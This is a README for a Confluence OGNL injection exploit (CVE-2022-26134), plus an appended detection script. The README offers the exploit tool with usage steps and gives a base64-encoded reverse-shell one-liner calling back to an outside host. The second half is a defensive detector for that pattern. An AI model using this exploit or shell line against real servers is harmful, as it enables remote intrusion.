## https://sploitus.com/exploit?id=EA88FA45-8CE7-5D7D-8E6C-B04F8392F7EB
# CVE-2022-26134
PoC and exploit for the Confluence OGNL expression injection RCE (CVE-2022-26134).

## Update
Added a sandbox bypass; higher versions are now supported.

# Usage
```
Usage: python Confluence_cve_2022_26134_RCE.py http://example.com/
```

The script automatically checks whether the target is vulnerable and, if it is, enters a pseudo-interactive shell.

Tested under Linux:  
![linux](https://raw.githubusercontent.com/SNCKER/CVE-2022-26134/master/linux.jpg)

Tested under Windows:  
![windows](https://raw.githubusercontent.com/SNCKER/CVE-2022-26134/master/windows.jpg)

Enter `q` when you want to quit.

# Some tips
Command parameters are passed directly to the `Runtime.exec` method, which runs them without the context of a shell, so:  
Under Windows, some commands such as `dir` cannot be executed directly; use `cmd.exe /c dir` instead.  
Under Linux, some special symbols do not take effect. If you need to execute a command containing special symbols, such as a reverse shell, you can base64-encode it and then use `bash -c {echo,YmFzaCAtaSA+JiAvZGV2L3RjcC8xLjEuMS4xLzg4ODggMD4mmQ==}|{base64,-d}|{bash,-i}`.
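
The two wrappers in the tips above leave a recognisable trace in process-creation telemetry on the Confluence host. The following detection sketch is an added example, not code from this repository: it flags the brace-expansion base64 pipeline and JVM-spawned `cmd /c`, and decodes the payload for triage. The event schema (`parent`, `cmdline`), the paths and the sample events are constructed assumptions.

```python
import base64
import re

# bash -c {echo,<base64>}|{base64,-d}|{bash,-i}: the string has no whitespace, so
# Runtime.exec hands it to bash as one argument and brace expansion rebuilds the words.
BRACE_B64 = re.compile(
    r"\{echo,(?P<b64>[A-Za-z0-9+/]+={0,2})\}\|\{base64,(?:-d|--decode)\}"
    r"\|\{(?:ba|da|z)?sh(?:,[^}]*)?\}"
)
CMD_WRAPPER = re.compile(r"(?i)\bcmd(?:\.exe)?\s+/c\b")       # cmd.exe /c <builtin>
JAVA_PARENT = re.compile(r"(?i)(?:^|[\\/])java(?:\.exe)?$")   # parent is a JVM


def triage(event):
    """Return a finding for one process-creation event, or None if no rule matches."""
    cmd = event["cmdline"]
    from_jvm = bool(JAVA_PARENT.search(event["parent"]))
    match = BRACE_B64.search(cmd)
    if match:
        try:  # decode for the analyst; never execute the result
            raw = base64.b64decode(match.group("b64"), validate=True)
            decoded = raw.decode("utf-8", "replace")
        except ValueError:
            decoded = None  # malformed padding or alphabet
        return {"rule": "brace-base64-pipeline", "from_jvm": from_jvm, "decoded": decoded}
    if from_jvm and CMD_WRAPPER.search(cmd):
        return {"rule": "jvm-spawned-cmd", "from_jvm": True, "decoded": None}
    return None


# Constructed sample events (hypothetical paths and schema, harmless payload).
PAYLOAD = base64.b64encode(b"id; uname -a").decode()
JVM_LINUX = "/opt/atlassian/confluence/jre/bin/java"
JVM_WIN = r"C:\Program Files\Atlassian\Confluence\jre\bin\java.exe"
SAMPLE_EVENTS = [
    {"parent": JVM_LINUX, "cmdline": "bash -c {echo,%s}|{base64,-d}|{bash,-i}" % PAYLOAD},
    {"parent": JVM_WIN, "cmdline": "cmd.exe /c dir"},
    {"parent": r"C:\Windows\explorer.exe", "cmdline": "cmd.exe /c dir"},
    {"parent": JVM_LINUX, "cmdline": "hostname"},
]

if __name__ == "__main__":
    for ev in SAMPLE_EVENTS:
        print(ev["cmdline"], "->", triage(ev))
```

The `from_jvm` field lets an alert pipeline rank a hit whose parent is the Confluence JVM above the same command line typed by an administrator.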